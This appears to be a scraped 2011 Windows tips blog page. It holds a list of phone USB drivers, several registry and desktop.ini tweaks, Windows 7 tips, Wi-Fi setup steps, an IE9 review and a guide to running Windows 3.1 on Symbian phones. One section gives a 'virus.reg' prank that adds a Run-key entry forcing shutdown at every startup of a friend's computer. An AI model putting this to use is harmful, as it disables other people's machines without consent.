USB FT SCR2000 Holder
USB Modem Driver
USB Root Hub
USB Serial Converter
USB Serial Port
USB Serial Port by Vygisoft
USB Token Device
USB Token Holder
UST Pro II Device
UST Pro II Port
V710 - 3G Application Interface
V710 - 3G Modem
V710 - 3G PC UI Interface
Virtual Serial Bus Enumerator
Virtual Serial Port on FLC-20 USB
Vodafone 902T
Vodafone 902T AT Command Port
Vodafone 902T Modem
Vodafone 902T OBEX Port
Windows Mobile-based Device
Windows Mobile-based device support
WinDriver
WL230USB Wireless B+G USB 2.0 Adapter
Z3X BOX Serial Port
Z3X BOX Serial Port (COM4)
Z3X USB Serial Converter
ZTE Handset Diagnostic Interface
ZTE Handset USB Modem
ZTE NMEA Device
And .....................

2.30
2K_XP_COM
338-usb-driver-w98-2k-xp
3G PC UI Interface
ADLDrivers_new6270
AMOI - MD-1
Android USB Driver
ApeDrivers
Asus-V80
Benq
BenQ_M300_USB_Driver
Bird-S198-S199-S1186
C2000_C5000
Cable
cabletotal
CL75
Cruiser
Cyberflex Access e-gate Drivers
Dct4Direct
Driver, Bootload * DNW
driver_cables_setoon
Driver_MultiBox_v.1.1
Drivers_2.8.0
Drivers219
DSS
dss_cable_drivers
E220
e228-usb-driver-w98-2k-xp
e313-usb-driver-w98-2k-xp
e616-usb-driver-w98-2k-xp
e-gate_W2k_XP
EMP_DL_USBDriver
ET-BOX
F230
F3_Usb_Driver
FTDI
Furious
GStar_GM128_usb_driver
GX15-17-25 usb drivers for flash
httc-treo-driver
Huawei_Drivers_XP
Huawei_Vodafone_USB_Driver
iMode drivers
INFINEON
Infinity_Drviver
jaf_usb_driver2.0
L6i-mode_Driver
LOCOSTO
MT6218
MTK_driver
NECSmarT_DRIVERS
O2x4_Drv
Pana_VS2_VS3_MX6_SA6
Pana_VS2_VS3_MX6_SA6_v01
Pana_VS6_VS7_SA7_MX7
Pana_VS6_VS7_SA7_MX7_v01
Pana_VS70
Pana_X700
Pana_X700_v01
pantech-USB Driver
PDA BOX
Plusfon_Huawei_USB_Driver
QT-Xintel-VE
Qualcomm USB Treiber
qualcomm_usb_driver
RIFF_USB_DRIVER
S80_USB_Driver(USB data cable driver for S80,S82)
sagem
Samsung CDMA USB Driver
Samsung Drivers
Samsung Mobile USB Driver
SANYO 801SA DRIVER
SEMC
sharp905
smartfon
Smti
Sony-Ericsson
Spice-S1000
Spice-S555
Spice-S600
Spice-S640
Spice-S8
Spice-S800
Spice-S808
Spice-S900
Spice-S909
SpiderMan
TI_usb
Tiny
Toshiba
TS705_DRIVERS_XP
UC10 Drivers
unibox
UniversalBox
USB cable drivers
USB Modem Driver
USB_Drivers
USB210
USBox correctdriver
USBoxprogrammerdrivers
usbsmart_driver_v2
V171-USB-Device-Driver
VK
Vodafone-710
Vodafone-810
Vodafone-v810-v725-v716-usb-driver
Vygisdriver
Vygisoft VSD2XX New Drivers
Webcam_Win2kSp4_v1.1.0
Zxxx USB driver
And ............................

Added in V2.01



%USB VID_04e8*PID_6601*MI_04.DeviceDescRelease%
android_usb_windows
anyka driver
Pantech_O2_ICE_USB_Driver
C3303k-USB drivers
Cyclone Bootloader
MicroBOX_Driver
NEC Electronics
Nokia 7610 Supernova
Nokia N95
Nokia N95 8GB
Nokia USB Flashing Parent
PC Driver 1 (W370, W375, W376g, W377)
PC Driver 2 (W216, W230, W230x, W23x, W259, W270, W270x, W27x, W388, W396, W397, W397v)
RIFF_64bit_USB_Driver
RIFF_USB_DRIVER
SAGEM
Sagem_USBSerial
Samsung Drivers
Sony Ericsson P990 Application Port
Sony Ericsson P990 Composite Device
Sony Ericsson P990 PC-Connect Controller
Sony Ericsson P990 USB Modem
Sony Ericsson sa0101 ADB Interface Driver
Sony Ericsson seehcri Control Device
Sony Ericsson Slave Port
sunstone-V4_52_8_0-customer-free_WHQL_Digital_ID
UniversalBox
UniversalBox Nokia Device Driver
USB 3.0 Host Controller Driver
USB Data Cable Driver
USB Drivers XPeria X10
USB_Driver_3.4.6_patch_ for HG
Vodafone-v810-v725-v716-usb-driver
x8_USB_Signed_Drivers



Dawonload 

Monday, March 21, 2011

Remove the Recycle Bin from the Desktop For Ever

If you don't use the Recycle Bin to store deleted files, you can get rid of its desktop icon all together.
Run Regedit using the run command 'regedit' and go to:


HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/
CurrentVersion/explorer/Desktop/NameSpace


Click on the "Recycle Bin" string in the right hand pane. Hit Del and click OK. From now onwards recycle bin will not be shown even in the desktop properties window

Put Your Photo on Background of Pen Drive or HDD.

Step :1


Copy this code into notepad (copy and paste), then save it as "desktop.ini"


Code:


[.ShellClassInfo]
IconFile=%SystemRoot%\system32\SHELL32.dll
IconIndex=127
ConfirmFileOp=0


[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image="your_picture.jpg"
IconArea_Text="0xFFFFFF"
VeBRA sources - don't delete the tag above, it's there for XXXXX purposes -
[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}


[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=Folder.htt
PersistMonikerPreview=%WebDir%\folder.bmp


2. Put "desktop.ini" file onto your flash drive and replace "your_picture" with the
name of the picture you want to use leaving the .jpg extention the same.


3. Now copy the picture that you want to use onto your flash drive.


4. Refresh (F5) ..and enjoy with new background...


5. Enjoy...........

Shut Down Your Friend's Computer When it Starts

go to
run >
type notepad > and
den paste bellow written text and save it as
virus.reg


here:--


Windows Registry Editor Version 5.00


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"








DONT PUT IT IN UR COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you, start windows in safe mode, and open registry editor by typiing REGEDIT in start->run.


navigate to [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]and remove the string value named VIRUS, restart you computer.


You can also put this in a javascript code, just add this code to your webpage:

10 Best Windows 7 Tips and Hacks

1. Use Keyboard Shortcuts


Using the mouse, you can drag-‘n-dock windows to either side of the screen, or drag it to the top to maximize it. These keyboard shortcuts are even faster:


* Win+Left Arrow and Win+Right Arrow dock the window to the left and right side of the screen
* Win+Up Arrow and Win+Down Arrow maximize and restore/minimize
* Win+M minimizes everything
* Alt+Up, Alt+Left Arrow, Alt+Right Arrow navigate to parent folder, or browse Back and Forward through folders in Explorer
* Win+Home minimizes/restores all open windows except the active window
* Alt+Win+# accesses the Jump List of program number ‘#’ on the taskbar




2.Rearrange System Tray Icons




You can rearrange icons on the taskbar as you wish and start new (or switch to running) instances of the first ten taskbar programs using Win+1, Win+2, and so on. The cool thing is you can also rearrange system tray icons. Reorder them on the tray or move them outside or back in the tray. Take control of what you want to always keep an eye on, and from which apps you’ll require notifications.




3. Access Jump Lists with the Left Mouse Button


Jump Lists usually show up when you right-click on a taskbar icon. However, they can also be accessed by holding the left mouse button and dragging upwards. If you’re using a laptop touchpad or a touch screen, this is convenient because you do not have to click any button to access a context menu.




4. Add Any Folder to Favorites




You can add any library or folder to the Favorites section in Windows Explorer. To add a folder, navigate to it in Explorer, right-click Favorites in the left navigation pane, and select Add current location to Favorites. Now you get quick access to your favorite folders in all File->Save As dialogs!




5. Pin Frequently Used Folders to the Taskbar


Right-click, drag, and pin your favorite folders to Windows Explorer on the taskbar. They will now show up in the Jump List when you right click on Explorer giving you quick access to your favorite folders.




6. Pin Control Panel to the Taskbar




You cannot pin the Control Panel to the taskbar via the Start Menu or by drag and drop. Open the Control Panel and right-click its taskbar icon to pin it to the taskbar. An advantage of this is that Control Panel’s Jump List allows quick access to recently used functions.




7. Create Keyboard Shortcuts for Programs


You can create keyboard shortcuts for any program in Windows 7. Right-click the program icon and select Properties. Select the Shortcut tab, click in Shortcut key, to set the keyboard shortcut for that program.




8. Open Command Prompt in Any Folder


Like the command prompt? Miss the ‘Open Command Window Here’ Windows XP power toy? Press ‘Shift’ when right-clicking on a folder to get that option in the context menu. This also works on the desktop. No power toy required!




9. View Expanded ‘Send To’ Menu


Press Shift when right-clicking on a folder to get an expanded Send To menu.




10. Adjust Screen Text with Clear Type


Use Clear Type Tuner for the best look on your LCD monitor or laptop screen. Run ‘cttune.exe’ from the Start Menu search box, or go to the Control Panel Display applet, and select Adjust ClearType Text from the left.

How To Secure Your Wi-Fi

Follow These Steps :


1-Enable WPA2 encryption
and MAC filtering


how to enable wpa2 >open browser >192.168.1.1(ur default gateway)


2 - put ur admin password - after it ur modem config has been open - go to setting - wireless - change wireless SSID to any name


3 -goto wireless security tab -security mode select WPA2 personal - then WPA algorithms select TKIP+AES


-add password


-save setting

Wednesday, March 16, 2011

Microsoft Internet Explorer 9 Arrives: 10 Reasons to Use It

News Analysis: Microsoft has officially launched Internet Explorer 9. Although the browser’s history has been spotty, Internet Explorer 9 is the one new browser that every user should be trying.Rate This Article:





Microsoft has officially launched Internet Explorer 9. The browser, which is being touted by many reviewers already as the best version of the software the company has ever released, follows a long line of predecessors that at times won customers over and at other times failed miserably. But it's a new day for Microsoft and Internet Explorer. The time has finally come for the company to face Google's Chrome browser head-on.

But perhaps now Windows users are wondering if they should use Internet Explorer 9. Some of those folks are using previous versions of the browser and might be pleased with it. Others might be using Chrome, Firefox or Opera, and couldn't fathom the thought of moving to Microsoft's latest browser.

But the clear truth is every single Web user regardless of the browser they're using now should try out Internet Explorer 9. It's speedier, more user-friendly and has enough additional improvements to coax any user to download the browser and use it.

Read on to find out why consumers and enterprise customers should start browsing the Web with Internet Explorer 9.

1. It's fast

By all measures, Internet Explorer 9 is the fastest browser Microsoft has ever released. The browser has an improved JavaScript engine named Chakra and uses hardware acceleration to deliver Web pages to users sooner. The idea behind Internet Explorer 9's improved speed is to rely upon today's PC components including the CPU and GPU to get users to their favorite Websites faster. So far, it seems that Microsoft has achieved that goal.

2. A vastly improved interface

One of the biggest issues with previous versions of Internet Explorer was the browser's design. It was ugly. Rather than put the browsing experience first, Microsoft forced users to deal with too much clutter around a Web page. That's gone, finally. In Internet Explorer 9, Microsoft has created a clean, simple interface that puts browsing at the core of the experience. It's nice to see.

3. It's awfully Chrome-like

It's obvious after loading Internet Explorer 9 that Microsoft took some cues from Google. That company's Chrome browser features the simple, slimmed-down design that Internet Explorer now features. It also has the Omnibox that lets users input Web addresses and search the Web in one place. Microsoft's option, which performs the same action, is called One Box. Plus, Chrome's appeal is speed. But as noted above, it looks like speed might be a key feature for Internet Explorer 9 as well.

4. The Pinned Sites feature is nice

Microsoft has the luxury of being the company that not only designs the browser, but also supports the operating system it runs on. Because of that, it was able to bring Pinned Sites to Internet Explorer 9. That feature lets users save their favorite Websites to the Windows 7 Taskbar for easy access. Pinned Sites are similar to launching applications on the desktop. It's a nice service.

Saturday, March 5, 2011

First Windows on Symbian S60 Device




UPDATE

Using new version of DOSBox you can allocate up to 12MB RAM for Windows 3.1 on Nokia 95-1 or similar phones. Also you can disable standard Windows Shell (Program manager) and use only Calmira II.

1. Do all steps from instruction.
2. Edit 'e:\Data\dosbox.conf' file and change memsize=8 or more.
3. Edit 'e:\Data\dosbox.conf' file ane change end line to:

c:\windows\win.com /s

4. Edit 'e:\Data\Windows\system.ini' file to include:

;shell=progman.exe


shell=c:\Programs\Calmira\Calmira.exe

INSTALLATION GUIDE v1.2 (ENGLISH)

I. DOSBox v0.72 for Symbian by kolijoco (release 20090305)

1. Uninstall previous DOSBox versions.
2. Unpack 'DOSBox_s60.rar' archiwe to your Memory Card
3. Install ALL aplication from 'Install' directory.
4a. Install 'dosbox.sisx' on Nokia N95-2, N82 or similar (with 128 MB RAM).
4b. Install 'dosbox_slim.sisx' on Nokia N95-1 or similar (less RAM mamory).

II. Windows 3.1 for Symbian (included Norton Commander 5)

1. Unpack 'Win31en.rar' archive to your Memory Card.
2. Run installed DOSBox.

III. changes from release 1.0:

- Added MCGA (320x200) Driver
- Added Win32s v1.30c with OLE

IV. Suggestions

1. To change DOSBox allocated 2MB RAM edit line 'memsize=2' in file 'e:\Data\dosbox.conf'.
2. If your mobile phone have enough RAM memory you can install Sound Blaster 16 driver:
Control Panel -> Drivers -> Add -> Creative Lab Sound Blaster 1.5 -> RestartV. Using T9 Keypad

Receive Call (Green) - Switching Mode
End Call (Red) - Exit from DOSBox
Pen Key – Shift
Delete (C) – Backspace
Thumb Pad - Arrow Keys, Enter
Right Key – Escape
Left Key – Space

Mode 1:

First line keys = a d g j m p t w space
First line keys + Pen =: A D G J M P T W space
Second line keys + * = b e h k n q u x .
Second line keys + * = Pen + * B E H K N Q U X
Third line keys + # = c f i l o r v y \
Third line keys + Pen + # = C F I L O R V Y
Fourth line keys + 1 = s z
Fourth line keys + Pen + 1 = S Z

Mode 2:

Numbers = 1 2 3 4 5 6 7 8 9 0
Numbers + Pen = ! @ # $ % ^ & * ( )

Mode 3:

Thumb Pad - Moving mouse
* = Right mouse button# = Left mouse button
Screenshot from installation:






























Download